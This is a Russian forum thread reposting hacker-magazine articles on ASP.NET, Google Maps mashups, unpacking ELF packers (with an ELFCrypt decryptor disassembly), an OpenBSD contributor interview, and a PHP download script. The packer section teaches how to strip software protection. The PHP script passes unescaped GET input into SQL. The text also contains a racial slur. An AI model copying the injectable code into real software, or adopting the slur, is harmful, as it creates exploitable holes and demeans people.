Эффективность языков семейства .NET, в частности C#, растет с каждой новой версией. Вспоминая разработку на C, можно сказать, что 25% времени работы над проектом уходило на разработку, а 75% — на отладку и тестирование. В случае с C++ эти показатели сравнялись: 50% на 50%. Говоря о C#, можно смело утверждать, что соотношение достигнет уровня 75% на 25% соответственно.

Важно наличие готовых решений, которое отлично ускоряет процесс разработки. Тебе не придется разрабатывать какие-либо дополнительные библиотеки для своих нужд — они уже есть в ASP.NET.

1. Web-формы и сетевые компоненты

Позволяют переложить управление отрисовкой HTML-страницы на плечи ASP.NET и заняться разработкой функциональной части. Притом ты сможешь перегрузить любой элемент управления под свои нужды, и, соответственно, сделать шаг к созданию системы поддержки контента (CMS).

2. Компоненты отображения данных и контроля ввода

Среди готовых решений ты найдешь: проверку вводимых данных, проверку с использованием регулярных выражений, календарь, доску объявлений, генератор сложных таблиц и другие компоненты, доступные для скачивания с сайта www.asp.net.

3. Доступ к базам данных

Технология ADO.NET позволяет взаимодействовать с базами данных вне зависимости от их типа. В последней версии ADO.NET разработчики Microsoft хорошо потрудились над оптимизацией и значительно повысили производительность.

4. Доступ к файлам, потокам ввода-вывода, электронной почте

Набор простых в использовании классов значительно облегчает жизнь при работе с файловой системой, потоками и отправкой электронной почты.

5. Работа с XML

Сколько бы ни говорили об излишней структурной сложности формата XML, работа с этим форматом однозначно затронет любого разработчика. Средства, представляемые ASP.NET, объединяют в себе удобный набор классов для работы с XML-данными. XPath — язык выполнения запросов, XSL — язык преобразований. В арсенале ASP.NET припасен мощный инструмент — Visual Studio, поэтому конкуренты теряют абсолютно все шансы. В области оконных интерфейсов Microsoft вне досягаемости.

улучшения

Подтверждением роста ASP.NET можно считать выход второй версии .NET Framework и улучшения в новой версии, перечисленные ниже.

[изменение модели кодирования и связывания web-страницы и кода.]

В новой версии все операции по определению элементов страницы и событий производятся автоматически, что повышает читабельность кода и упрощает разработку.





Автор: Metallica Dec 5 2006, 17:28

изменение модели компиляции.]

В первой версии все элементы со встроенным кодом принудительно размещались на web-сайте — и их могли украсть (заинтересованные лица aka хакеры). Во второй версии более тщательно проработаны четыре модели компиляции, каждая их которых покрывает большинство типичных задач по развертыванию web-приложения.

[расширение функциональности страницы.]

В новой версии введены новые события для более полного контроля над жизненным циклом страницы, а также возможности межстраничного обмена данными.

[усовершенствованные методы кеширования.]

В новом подходе к кешированию используются страничное, фрагментное и объектное кеширование, благодаря чему возможно более эффективно разделять динамическую и статическую части передаваемых web-страниц.

[улучшение производительности.]

Скорость работы стека событий повышена на 30%. Мощность web-сервера IIS 6.0 возросла, многие его функции работают на уровне ядра Windows.

диагноз

Технология ASP.NET может стать тем оружием, которое пригодится тебе для решения совершенно разных задач — и создания сайта-визитки, и реализации сложного интерфейса доступа к интернет-магазину. Правда, перед началом разработки очень важно изучить сильные и слабые стороны данной технологии.

[к сильным сторонам ASP.NET относятся:]

разделенная модель

Разделение разметки и функционального кода позволяет избежать нарушений в работе web-приложения. Возможность связывания событий и отображения данных на клиентской стороне и их обработка на серверной стороне позволяет реализовать сложные схемы взаимодействия.

широкий выбор .NET Framework-библиотек

Богатый набор библиотек с различной функциональностью позволяет использовать их для отправки e-mail-сообщений, работы с XML-данными, графического представления данных, доступа к базам данных и других задач.

безопасность

Не удивляйся. Новости об обнаруженных уязвимостях в продуктах Microsoft появляются часто и быстро распространяются, но эти уязвимости устраняются так же быстро. Все-таки огромные денежные средства, вложенные в поддержку этих продуктов, заставляют держать удар. Плюс, признаемся сами себе, хакеры реагируют на продукты Microsoft как быки на красную тряпку.

эффективность, функциональность и ООП

С точки зрения объектно-ориентированного подхода, любой разработчик только с большим трудом найдет что-то более эффективное и удобное, чем выбор из языков C#, VB.NET, J#.NET и др. Ты можешь использовать все сильные стороны этих языков и их отличия от интерпретируемых языков: жесткая типизация данных, структурированная обработка ошибок и чистота языка.

среда разработки

Богатые средства разработки и отладки сполна реализованы в среде Visual Studio. Это, пожалуй, главный помощник в продвижении технологии ASP.NET.

документация

MSDN огромен, как Вселенная, в чем и состоит его положительная и отрицательная сторона.

производительность ASP.NET

Доводов в пользу ASP.NET столько же, сколько против него. Нужно сказать, что производительность web-приложения целиком зависит от твоего опыта как разработчика и лишь частично — от производительности аппаратной составляющей системы.[есть и отрицательные стороны:]

стоимость платформы

Для создания платформы, на которой можно с нуля разработать и развернуть web-приложение, тебе понадобится внушительный список продуктов фирмы Microsoft. Среди них: операционная система, среда разработки, база данных и др. Общая стоимость может превысить несколько тысяч долларов.

сложность изучения

Сложная нелинейная архитектура обязательно подразумевает массу времени на ее изучение. Новизна технологии и отсутствие информативной литературы также усложняют ситуацию. Возможно, поэтому ASP.NET-разработчики сейчас востребованы и хорошо оплачиваются.

закрытый исходный код

Неизбежное зло в позиции Microsoft относительно открытости кода, из-за которого осложняется жизнь множества разработчиков.

Многие отрицательные стороны можно считать особенностями. Неподъемный бюджет и закрытый исходный код в реализации от Microsoft сейчас не представляют проблемы, так как уже существует открытый аналог ASP.NET для не-windows-платформ. Есть открытый проект, поддерживающий мультиплатформенную реализацию ASP.NET, — Mono Project (www.go-mono.com). Несмотря на неполную реализацию некоторых функциональных частей, некоторое количество ошибок и нестабильную производительность, эта альтернатива работоспособна.

[конкуренты и перспективы.]

Альтернативные разработки все-таки появляются, и это также свидетельствует об ASP.NET как об удачном решении. Но не будем забывать о конкурентах, которые давно живут на рынке web-технологий.

Эти результаты — обобщение отзывов в основном разработчиков, собранных по большей части на форумах и из разрозненных результатов исследований разных организаций. Сейчас практически невозможно найти абсолютные показатели, сравнить которые было бы реально, — нет общих критериев для сравнения web-технологий.

Как видишь, разница между интерпретируемыми языками и компилируемыми очевидна. Также не забудем, что эту проблему по-разному оценивают три стороны: заказчик, руководитель и разработчик. Точка зрения заказчика, как правило, простая и неглубокая: чтобы работало хорошо, чтобы стоило мало и чтобы делалось быстро. В реальности приходится выбирать два из трех «чтобы».

заключение

Не буду рисковать и не стану навязывать тебе ASP.NET как панацею от всех бед. Можно только утверждать, что технология достойна высокой оценки.

Когда разработчики на перекуре разговаривают об использовании J2EE или PHP вместо C# и ASP.NET, все дружно плюются и говорят, что даже думать не хотят об этом. Несмотря на то, что все знают не одну и не две технологии разработки web-приложений. Когда речь заходит о покупке лицензии на продукты Microsoft для развертывания системы на Windows Embedded, все плюются так же дружно и крутят пальцем у виска.

И что делать? Решение очень простое: разработка и тестирование ведется в Visual Studio, а развертывание системы осуществляется с помощью связки Mono и Linux Gentoo. Конечно, так поступают не из-за хорошей жизни. Это решение содержит множество минусов и неудобств. Плохо, что проект Mono поддерживается корпорацией Novell, и вместо зависимости от Microsoft разработчик попадает в другую, не меньшую зависимость. Еще один минус такого решения — нестабильная производительность на различных аппаратных конфигурациях. Решение неудобно и тем, что оно вынуждает выбирать и долго конфигурировать web-сервер, будь то Apache или XSP.




Автор: Metallica Dec 5 2006, 18:51

реализация идеи в коде

ТЕХНИЧЕСКИЙ ДИРЕКТОР DEFA GRUPPE)

СОЗДАЙ СВОЙ СЕРВИС

КАЖДЫЙ ИНТЕРНЕТ-ПОЛЬЗОВАТЕЛЬ, КОТОРЫЙ УМЕЕТ ЧИТАТЬ И СЛУШАТЬ, ЗНАКОМ С WEB 2.0. КАЖДЫЙ УВАЖАЮЩИЙ СЕБЯ WEB-РАЗРАБОТЧИК НЕ ОДИН РАЗ ПОДУМЫВАЛ О WEB-СЕРВИСЕ ИЛИ ПЫТАЛСЯ СОЗДАТЬ ЕГО. ЧЕМ ВЫЗВАН ИХ БЛАГОРОДНЫЙ ПОРЫВ? ИНОГДА ЖАЖДА СЛАВЫ, ИНОГДА ЖЕЛАНИЕ ПРОВЕРИТЬ СВОИ СИЛЫ, ИНОГДА ПЕРСПЕКТИВА ЗАРАБОТКА

Антон Скоробогатов

Участвовал в нескольких проектах, использующих некоторые принципы web 2.0: «Элементы» (www.elementy.ru), «сообщество Девчат» (www.devchat.ru) и др. Личные достижения: создание и поддержка русского сообщества пользователей одного из популярных движков для блогов — Wordpress (www.mywordpress.ru)

Главное в создании web-сервиса — это идея и ее быстрое воплощение. Мы расскажем о том, как можно быстро реализовать свою идею в коде.

основные направления сервисов

С каждым днем становится все сложнее и сложнее найти хорошую идею для web-сервиса. Каждый день появляется что-то новое (чтобы быть в курсе, читай блог The Museum of Modern Betas — http://momb.socio-kybernetics.net). Например, существует огромное множество сервисов так называемых «социальных закладок», причем в самых разных вариациях. Вспомни del.icio.us, furl, spurl и т.д. и т.п. Есть и проекты с открытым исходным кодом, реализующие базовую функциональность таких сервисов, — хорошая площадка для твоего старта. Подумай, как можно улучшить сервис.

Пионеры не всегда оказываются на коне, иногда необходима небольшая доработка сервиса напильником, чтобы он начал покорять сердца пользователей. Так что, перед тем как сядешь программировать, хорошенько прошерсти интернет и найди какой-нибудь сервис. Потом подумай, кому он может быть полезен. Только тебе? Уже хорошо. Если же никакой пользы не обнаружено, браться за развитие не стоит.

[смешать, но не взбалтывать.]

Самый простой способ создать собственный сервис — позаимствовать сервис, в котором есть API, перемешать по вкусу и выдать жаждущим. Однако обо всем по порядку.

Многие сервисы предлагают API для доступа к данным, что позволяет пользователям получать информацию не в виде набора HTML-страниц, а в более формализованном виде. Простейшим примером такого API является RSS (Really Simple Syndication) и предложение сайта получить 10, 20, 30 и т.д. новостей в этом формате. При использовании RSS ты сможешь публиковать на своем сайте новости сторонних проектов не используя сложных HTML-парсеров. Этот пример самый примитивный.

Более сложные API предоставляют более широкие возможности. Например, API известной Google Maps позволяет наносить на карту мира любые метки и использовать геоинформацию в корыстных целях. Кстати, недавно в Google Maps появилась полная карта Москвы с названиями улиц — повод задуматься. Альтернативой Google Maps является Virtual Earth от Microsoft. Что выбрать — решать тебе. Добавлю только, что пока Россия представлена лучше всего в Google Maps.

[работать с API несложно,] достаточно базовых знаний XML, PHP и JavaScript.

пример

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="content-type" content="text/html; charset=utf-8"/>

<title>Google Maps JavaScript API Example</title>

<script src="http://maps.google.com/maps?file=api&v=2&key=abcdefg" type="text/javascript">

</script>

<script type="text/javascript">

//<![CDATA[

function load() {

if (GBrowserIsCompatible()) {

var map = new GMap2(document.getElementById("map"));

map.setCenter(new GLatLng(55.751729,37.6170), 13);

}

}

//]]>

</script>

</head>

<body onload="load()" onunload="GUnload()">

<div id="map" style="width: 500px; height: 300px"></div>

</body>

</html>

Эта простая HTML-страничка загрузит карту размером 500 на 300 пикселей, в центре которой расположен московский Кремль. Все общение с Google Maps, как видно по этому примеру, ведется через JavaScript-объект GMap2. Интерфейс к нему открыт и описан на странице документации (www.google.com/apis/maps/documentation). Бармены web 2.0 делают поистине впечатляющие коктейли на основе этого API — Mashup, и это только один пример из известных API. На сайте ProgrammableWeb (www.programmableweb.com) ты сможешь найти более 200 API, которые помогут в реализации твоих идей, и более 600 mashup на их основе. И не забудь: смешать, но не взбалтывать.

[пять пудов PHP.]

PHP — один из самых простых и, пожалуй, самый распространенный язык программирования для web’а. Как же можно быстро создать на PHP свой сервис? Писать с нуля — долго и неэффективно. Что же делать в такой ситуации? На помощь придут фреймворки — наборы программных компонентов, которые подогнаны друг к другу и вместе составляют базу для написания твоей программы. Использование фреймворка значительно сокращает время разработки, поскольку большинство рутинных операций уже реализовано в коде. Тебе остается лишь концептуальная часть. Не нужно думать о SQL-запросах, о валидации форм, об авторизации пользователя — обо всем этом подумали создатели фреймворков. Так что советую перестать изобретать велосипед, то есть взять готовый и ездить именно на нем.

На выбор предлагается множество моделей: CakePHP, Seagull, Symfony, Zend Framework и многие-многие другие. Каждый имеет свои плюсы и минусы, выбор за тобой. Ориентируйся на фреймворки, заточенные под PHP 5: использование особенностей новой версии дает преимущество не только в скорости разработки, но и в скорости работы самого скрипта.

[остановимся на дополнительных библиотеках,] которые наверняка понадобятся при создании собственного сервиса. Для работы с Google Maps используй GoogleMapAPI от PHPInsider (www.phpinsider.com/php/code/GoogleMapAPI) — эта библиотека упрощает работу.

пример кода, переписанного с использованием GoogleMapAPI

<?php

require('GoogleMapAPI.class.php');

// Yahoo API необходим для поиска широты и долготы по адресу

$map = new GoogleMapAPI('map', 'YourYahooAppId');

// Путь к базе данных, чтобы сохранять найденные широты и долготы

$map->setDSN('mysql://USER:PASS@localhost/GEOCODES');

// Ключ API для доступа к Google Maps

$map->setAPIKey('absdefg');

?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<?php $map->printHeaderJS(); ?>

<?php $map->printMapJS(); ?>

<!-- necessary for google maps polyline drawing in IE -->

<style type="text/css">

v\:* {

behavior:url(#default#VML);

}

</style>

</head>

<body onload=”onLoad()”>

<?

$map->setCenterCoords(37.6170, 55.751729);

$map->printMap();

?>

</body>

</html>

Собственно код ненамного короче, иногда он получается даже длиннее, а сколько возможностей открывается… В базе данных ты можешь хранить точки на карте и добавлять их на страницу лишь вызовом метода: $map->addMarkerByCoords($lon,$lat,$title = '',$html = ''), где $lon — долгота точки, $lat — широта, $title — заголовок точки, а $html — кусок кода, который будет показан во всплывающей подсказке к точке. Никакого волшебства — только небольшое знание PHP и полезная библиотека. Ты сможешь создавать собственные карты, слои для карт и ставить сколько угодно меток на карте. Захотел — сделал сервис для друзей, чтобы помечать место очередной совместной попойки. Захотел — сделал что-нибудь посерьезней, например пометил точки выхода в иные измерения и места сходок.

Для работы с большинством сервисов достаточно RSS-парсера (например, MagPieRSS — http://magpierss.sourceforge.net). Именно в RSS предоставляют данные del.icio.us, last.fm, flickr и другие сервисы, ориентированные на распространение пользовательского контента. Также могут понадобиться библиотеки для работы с REST, XMLRPC, JSON –ты всегда найдешь их в Сети в изобилии.

Используя готовый framework и сторонние библиотеки для работы с сервисами, ты сможешь быстро изготовить свой коктейль и так же быстро предложить его на суд пользователей, но для разработки полноценного сервиса с нуля стоит попробовать и другие языки программирования.

[рубиновые рельсы.]

Ruby On Rails — это фреймворк для создания web-приложений на языке Ruby. Слово «Ruby» вошло в лексикон кодера и стало очень модным, хотя он скрывает в себе смертельную опасность для негров-кодеров, которые умеют быстро печатать на клавиатуре, но не умеют думать. Надеюсь, ты не такой, в тебе сидит здоровая лень, то есть, как известно, двигатель прогресса. Начни с закачки пакета InstantRails (http://instantrails.rubyforge.org/wiki/wiki.pl), он представляет собой сборку Apache, MySQL и Ruby и работает без установки. Скачал, распаковал — работает!

Разработчики некоторых PHP-фреймворков пытаются копировать принципы RoR. CakePHP, Symfony, PHP on Trax — все это попытки перенести изящность и элегантность RoR в мир PHP. Однако изящность RoR состоит не в самом наборе библиотек, а находится на уровне языка Ruby. PHP-фреймворки полезны, но не обеспечивают того уровня fun в программировании, который гарантирует Ruby.

RoR вобрал в себя практически все паттерны объектно-ориентированного подхода к программированию. Самым востребованным шаблоном является Active Record. Часто программисты пытаются облегчить процесс выборки информации из базы данных — пишут различные собственные функции, обобщают SQL-запросы. Простым и гениальным решением для них может стать паттерн Active Record, созданный Мартином Фаулером.

[сравним два листинга:]

$sql = “SELECT * FROM people WHERE person_id = ‘1’”;

$res = mysql_query($sql);

@person = Person.find(1)

Чувствуется разница. Во втором случае (после взятия из БД) person является объектом, и можно производить над ним разные действия, которые будут отражены в базе данных. Играючи выбираем данные по разным параметрам, из связанных таблиц и т.д. Не нужно подолгу размышлять о SQL-запросах: просто определи, что нужно именно тебе, и сразу же начинай воплощать это в коде. Кодерство осталось в прошлом, будущее принесет тебе Rapid Application Development (быстрая разработка приложений) и звание разработчика.

В шаблонизаторе RoR имеется множество встроенных помощников (helpers), позволяющих реализовывать AJAX-вызовы и визуальные эффекты не выходя за рамки языка Ruby. Все это чудо происходит за счет библиотеки Prototype и ее спутника Script.aculo.us.

[волшебство Script.aculo.us.]

JavaScript давно стал «нашим всем» — с тех времен, когда все таскали с одного и того же ресурса скрипт с падающими снежинками и размещали его у себя на сайте. Эх, куда ушли те времена... Слава светлым силам, что они прошли: JavaScript использовался только для бесполезного украшательства. Сейчас же в основном его применяют для повышения usability. Конечно, иногда налицо перерасход фантазии, но это лишь «перегибы на местах».

JavaScript, как и Ruby, — объектно-ориентированный язык. Видимо, поэтому PHP-программисты часто не дружат с ним и пытаются найти способ облегчить свои страдания при написании простеньких скриптов, пока не найдут священный Грааль — библиотеку Prototype. В первую очередь она привлекает внимание к себе замечательной по простоте функцией $ (доллар). Этот знак хорошо знаком всем нам не только по многочисленным обменникам валют, но и по языку PHP. В Prototype этот знак заменил сложную конструкцию document.getElementById(‘id’). Получается, что, обращаясь $(‘id’), ты работаешь с любым элементом на странице так, как будто работаешь с переменной. Очень удобно!

Начиная с версии 1.5.0 в Prototype также имеется функция «два доллара» ($$) — в два раза дороже одного доллара. Воспользовавшись этой функцией, ты обращаешься к целому семейству элементов массива, основываясь на правилах css-селекторов. $$(‘p.left’) — получаешь коллекцию абзацев, которым присвоен класс left.

Следующее бескомпромиссное удобство — расширения объектов, в том числе кроссбраузерная поддержка событий. Объект Event позволяет назначать события любому элементу на странице. В общем, твоя работа с коллекциями и элементами массивов превратится в прогулку по райским кущам.

для всех ссылок на странице, имеющих класс alert, перед загрузкой ссылки вывести окно с адресом ссылки




Автор: aler Dec 6 2006, 20:27

Цитата(Metallica @ Dec 5 2006, 19:51) *


dry.gif
%

Автор: Metallica Dec 6 2006, 20:56

Обзор упаковщиков исполняемых файлов под *nix

Долгое время единственным упаковщиком исполняемых файлов в *nix был легендарный UPX, содержащий встроенный декомпрессор и распаковывающий файлы без особого труда. Но сейчас ситуация изменилась, и упаковщики стали появляться, как грибы после дождя. Ими охотно пользуются разработчики коммерческих программ с закрытым кодом, не задумываясь о том, какие проблемы они создают своим пользователям. Сегодня мы покажем, как, не будучи хакером и не имея навыков в дизассемблировании или отладке, победить наиболее популярные упаковщики (ELFCrypt, UPX, Burneye и Shiva).

Введение

Упаковщики исполняемых файлов часто используются для затруднения анализа программы и препятствия взлому. Упакованный файл потребляет намного больше оперативной памяти, а на некоторых *nix-клонах вообще отказывается запускаться или работает нестабильно. В первую очередь это касается *BSD (основная масса упаковщиков ориентирована на Linux) и экзотических систем с экспериментальными ядрами наподобие Hurd. В результате от упаковщиков/протекторов стремится избавиться даже тот, кто вообще не собирался ничего ломать!

ELFCrypt

Происхождение: создан индийским студентом по прозвищу JunkCode. Распространяется в исходных текстах на бесплатной основе: www.infogreg.com/source-code/public-domain/elfcrypt-v1.0.html.

Описание: простейший шифровщик (не упаковщик!) ELF-файлов, шифрующий файл по XOR случайно генерируемым ключом. Присваивает кодовой секции атрибут writable и не убирает его после завершения расшифровки (что может приводить к некорректной работе программ, проверяющих возможность модификации кодовой секции). Остальные секции (и секция данных в том числе!) остаются незашифрованными. Не содержит никаких антиотладочных приемов, но подкладывает две большие свиньи дизассемблерам: «забывает» скорректировать метку _start и размещает свой код в секции extern, истинное содержимое которой IDA Pro отображает только в режиме ручной загрузки при выбранной опции: «Force using of PHT instead of SHT».

Распаковка: загружаем файл в Hiew, двойным нажатием <ENTER>'а переходим в режим дизассемблера, давим <F8> для отображения заголовка и переходим в точку входа по <F5>. Здесь прослеживается следующий код:

КОД

Дизассемблерный листинг окрестной точки входа программы, зашифрованной ELFCrypt'ом

; переходим на расшифровщик

.080495DC: EB02 jmps .0080495E0

; мусор, оставленный транслятором ассемблера

.080495DE: 06 push es

.080495DF: C6 ???

; сохраняем в стеке все регистры и флаги

.080495E0: 60 pushad

.080495E1: 9C pushfd

; начало расшифровываемого фрагмента

.080495E2: BEC0820408 mov esi, 0080482C0

.080495E7: 8BFE mov edi, esi

; количество двойных слов для расшифровки

.080495E9: B978000000 mov ecx, 000000078

; ключ расшифровки

.080495EE: BBBD03CC09 mov ebx, 009CC03BD

; читаем очередное двойное слово

.080495F3: AD lodsd

; расшифровываем через xor

.080495F4: 33C3 xor eax,ebx

; записываем результат на место

.080495F6: AB stosd

; мотаем цикл

.080495F7: E2FA loop .0080495F3

; восстанавливаем из стека флаги и регистры


Автор: Metallica Dec 7 2006, 10:05

интервью с демоном
Как мы впервые увиделись с Андрюшком? Давно это было. В те легендарные времена, когда люди были как братья, и деревья могли разговаривать, сидели мы в старом офисе, в тени раскидистого баобаба и попивали чай с вареньем. На улице была сильная гроза, и мы не сразу поняли природу внезапно раздавшегося звука. Помню, Покровский тогда сразу извлек из-под стола осиновый кол и серебряные пули (мы тогда увлекались «Молотом Ведьм» на ночь), распознав в этом звуке агрессивного обладателя железных копыт. Но, как оказалось, наш инквизиторский стафф был неэффективен против рогатого гостя – ведь он не настоящий демон, а символический. Веришь или нет, но он – самый настоящий BSD-механизм. Попробуем проникнуть в его биографию.

XS:

У читателей есть подозрение, что Андрюшок - не настоящий человек, а синтетический. Что ты на это скажешь?

A.M.:

На этот счет существует даже целая теория. Будто бы меня (компьютерную систему, имитирующую человеческое мышление) создали в недрах сверхсекретной лаборатории, находящейся в ведомстве министерства энергетики США. Спешу разочаровать тебя и читателей - это не так, я обычный человек с присущими ему пороками и недостатками. Хотя иногда мне кажется, что я веду синтетический образ жизни, и мне снятся синтетические сны...

XS:

Это все понятно: говорят, все инопланетяне, киборги и прочие гуманоиды именно так о себе и повествуют. Но будем считать, что мы тебе поверили. Ну что, коротко о себе? Кто такой, чем занимаешься? У тебя, наверное, семья, дети, друзья есть? Расскажи-ка о своем житье-бытье.

A.M.:

Родился в 1979 году в Нижнем Новгороде. Прожив на родине Максима Горького шесть лет, с родителями переехал в столицу, где закончил сначала школу, а затем университет и аспирантуру. Друзья-приятели совершенно разные, друг на друга не похожие, но с одинаковыми тараканами. Не женат, но я работаю в этом направлении ;-).

XS:

Ну, не будем рассуждать о том, чем и как ты трудишься в этом направлении smile.gif, лучше расскажи про настоящую работу. Насчет того, что ты редактор рубрики UNIXOID Хакер'а, мы в курсе, но вот я слышал, что ты работаешь в каком-то могучем НИИ? Это правда?

A.M.:

Моя основная работа - заведующий IT-отделом во Всероссийском НИИ, сотрудники которого занимаются научным обоснованием развития сельскохозяйственной мелиорации и гидротехники. Вообще, этот институт просто потрясающий, настоящий храм науки. Никитос и Токса, когда заходили в гости, несказанно впечатлились увиденным. Я не открою большой тайны, если скажу, что сейчас зарплата в бюджетных конторах только начинает приближаться к чисто символической, поэтому по совместительству работаю системным администратором в нескольких коммерческих фирмах. Кроме того, как ты уже упомянул, work'аю над журналом «Хакер». А на досуге для знакомых поднимаю виртуальные частные сети по протоколу IPSec и ваяю/поддерживаю сайты на базе CMS.

XS: Ого, какое же у тебя образование?

A.M.:

За шесть лет обучения в университете я получил два диплома о высшем образовании (дипломы бакалавра и магистра по специальности «Строительное дело»). Мне несколько раз предлагали работать по специальности, но я смутно представляю себя прорабом или сотрудником проектной организации, да и теперь уже совершенно точно уверен в том, что это не мое. Кстати, в моих статьях для «Хакера» периодически проскальзывают фразы типа: «закладываем надежный фундамент для нашей конструкции» smile.gif.
XS:

Вообще сложный вопрос: по-моему, работать строителем – это круто. Ну, знаешь как у группы «Кувалда» - «бетономешалка мешает бетон, бригада строителей жрет самогон». Опять же: виллы бы строил, гастрбайтеров гонял. Хотя быть хардкорным юниксоидом тоже очень здорово. Расскажи, а чем ты вообще крут в этом плане? Почему мы решили брать интервью у тебя, а не у Билла Гейтса? Ходит слух, что ты крутой кернел-хакер и чуть ли не один из разработчиков OpenBSD.

A.M.:

Постараюсь немного прояснить ситуацию. Начиная с конца 2002 года, в OpenBSD было внесено порядка двухсот моих изменений, и всего 20 из них касались ядра операционной системы, так что меня с огромным трудом можно назвать кернел- хакером. Я уделял первостепенное внимание аудиту исходного кода и по разным причинам старался не привносить в kernel/userland новый функционал. В большинстве своем мои патчи представляли собой наборы исправлений, которые были направлены на устранение ошибок (fd/FILE */memory leaks, double free, integer overflow, format string bug и др.) в библиотеке libc, сетевых демонах и штатных утилитах. Вопреки слухам, я не являюсь официальным разработчиком OpenBSD, хотя речь об этом неоднократно заходила с лидером проекта (Theo de Raadt).

XS:

Так значит, приходилось общаться с разработчиками? Расскажи о самых колоритных.

A.M.:

По электронной почте и на канале #hackers приватного чат-сервера мне удалось пообщаться со многими ведущими разработчиками OpenBSD (чат представляет собой нечто вроде урезанного по возможностям irc, потусить на нем можно только по спецприглашению). Довольно проблематично выделить из них кого-то одного, могу лишь отметить, что искрометный юмор на технические темы присутствует в изобилии. Цитата для примера: «You are in a maze of gpio pins, all alike, all undocumented, and a few are wired to bombs». В реале несколько раз встречался с Александром Юрченко (grange@), который занимается преимущественно дисковой подсистемой.

XS:

Итого... 180 изменений в системных библиотеках и программах из пространства пользователя, плюс 20 изменений в ядре... Хило получается sad.gif. Даже моя бабушка внесла больше. Расскажи про какой-нибудь последний подвиг на ниве BSD.

A.M.:

В конце прошлого года я прикупил себе очередную игрушку для души. На этот раз ей стала ультракомпактная, нетребовательная к питанию и абсолютно бесшумная система, представляющая собой материнскую плату VIA Epia MS форм-фактора mini-ITX с безвентиляторным процессором VIA Eden ESP. Висевшая на борту 100 мегабитная сетевуха с внешним PHY VT6103, наотрез отказалась работать. Три строчки кода, добавленные в ядерный драйвер vr(4), оказали на нее целительное воздействие. Brad Smith, один из девелоперов, заметил мой интерес к карточкам на чипсетах VIA Rhine, и мы с ним примерно за два месяца привели этот драйвер в порядок - вычистили неиспользуемый код, реорганизовали проверки, вернули потерянные при портировании из FreeBSD куски кода на свои места, сделали более сглаженными вход и выход из неразборчивого режима (promiscuous mode) и т.д. В настоящее время отлавливаю утечки памяти в демоне isakmpd(8), который обеспечивает работу по протоколу обмена секретными ключами.




Автор: Metallica Dec 7 2006, 11:32

хостинг для настоящих митьков
У НАС ЕСТЬ ПЛАТНЫЙ ХОСТИНГ, МЫ ПЛАТИМ ЗА НЕГО ПРИМЕРНО ПЯТЬ ДОЛЛАРОВ В МЕСЯЦ. КОНЕЧНО, МЕСТА, ВЫДЕЛЕННОГО СЕРВЕРУ, НЕ ТАК МНОГО, КАК ХОТЕЛОСЬ, А ХОЧЕТСЯ РАЗМЕСТИТЬ ТАМ ОЙ КАК МНОГО! ВЫХОД ЕСТЬ — NAROD.RU smile.gif

[что за система?] Конечно, на narod.ru мы разместим весь нужный софт, так как там дают неограниченное пространство, а потом напишем хитроумную систему, которая будет лежать на платном хостинге. С помощью этой системы любой пользователь сможет скачивать выложенные файлы, а ссылки будут вести на платный хостинг, и они будут выглядеть так: http://site.ru/download/download.php?id=19.

Система будет состоять из четырех файлов:

1 Скрипт добавления софта (add.php).

2 Скрипт скачки (download.php).

3 Форма для добавления софта (form_add.php).

4 Скрипт, отображающий софт, добавленный нами (index.php).

[принцип работы] системы очень прост. С помощью скрипта мы добавляем в таблицу имя сервера, имя файла и его описание. Скрипт скачки просто-напросто выдирает из таблицы данные, соответствующие номеру id (он передается из скрипта методом GET), и по ним перенаправляет браузер на софт.

Система использует базу данных MySQL, так что приконнектимся к мускулу и выполним простой запрос (листинг 1).

CREATE TABLE `download` (

`uid` int(11) NOT NULL auto_increment,

`file` text NOT NULL,

`server` text NOT NULL,

`ops` longtext NOT NULL,

`click` int(11) NOT NULL default '0',

PRIMARY KEY (`uid`)

) TYPE=MyISAM;

Этим запросом мы создаем таблицу download.

Поля и их описания в этой таблице:

- uid — уникальный номер файла;

- file — имя файла;

- server — имя сервера;

- ops — описание файла;

- click — количество скачиваний файла.

[начинаем кодить.] В скрипте form_add.php разместится форма добавления нового софта, она будет передавать данные скрипту add.php. В качестве метода отправки данных в ней мы будем использовать GET. Сами данные — это имя сервера, имя файла и его описание, то есть в скрипте мы напишем следующие поля:

<input type=text size=30 name=filen> — сюда будем вводить имя файла;

<input type=text size=30 name=server> — сюда — имя сервера;

<input type=text size=80 name=ops> — сюда — описание самого файла.

Например, мы закачали файл linux.rar на сайт http://mysite.narod.ru. Отсюда следует, что в поле File name должно быть введено linux.rar, а в поле Server name — http://mysite.narod.ru.

Однако можно и не писать в конце имени сервера знак прямого слэша «/». Тогда придется добавлять его в скрипте, который помещает все данные в таблицу (add.php), то есть вместо этой строки ($put = "$server$file";) нужно написать $put = "$server/$file"; (описание скрипта смотри ниже). В файле add.php мы соединяемся с базой данных MySQL, потом проверяем все передаваемые параметры на пустые строки и, если все нормально, добавляем эти переменные в таблицу. Пишем так:

mysql_connect($host,$user,"$password"); — здесь $host — имя сервера MySQL; $user — имя пользователя базы данных; $password — пароль этого пользователя.

Все переменные объявляем в начале скрипта. Далее выбираем базу данных, в которой лежит созданная таблица download:



@mysql_select_db($base) or die("Base Error"); $base — в этой переменной хранится имя базы, ее также объявляем в начале.

Затем мы делаем проверку на пустые строки — я не буду описывать как (можно посмотреть в исходнике на диске). После проверки, если все нормально, добавляем данные в таблицу:

mysql_query("insert into download values('', '$filen', '$server', '$ops','0')");

В этом скрипте нужно обязательно добавить проверку на расширение закачиваемых файлов, то есть скрипт должен фильтровать все файлы с расширениями *.php; *.php3;*.html;*.htm и т.д. Однако если этим скриптом будет пользоваться только админ, то и не нужно писать никакую фильтрацию. Можно пойти совсем простым путем и сделать фильтрование так, чтобы скрипт принимал только расширение *.rar, — так будет намного проще. Ах да! Здесь нужно добавить еще одну фильтрацию на спецсимволы в переменных: $filen, $server $ops.

Теперь рассмотрим стартовую страницу. На ней будут выводиться ссылки и описания всех добавленных файлов. Принцип работы скрипта похож на принцип работы предыдущего скрипта. Мы так же соединяемся с MySQL, только вместо добавления информации в таблицу мы извлекаем ее и выводим на экран.

..здесь соединяемся с MySQL...

print "<body bgcolor=000000 link=orange alink=orange vlink=orange text=ffffff>";

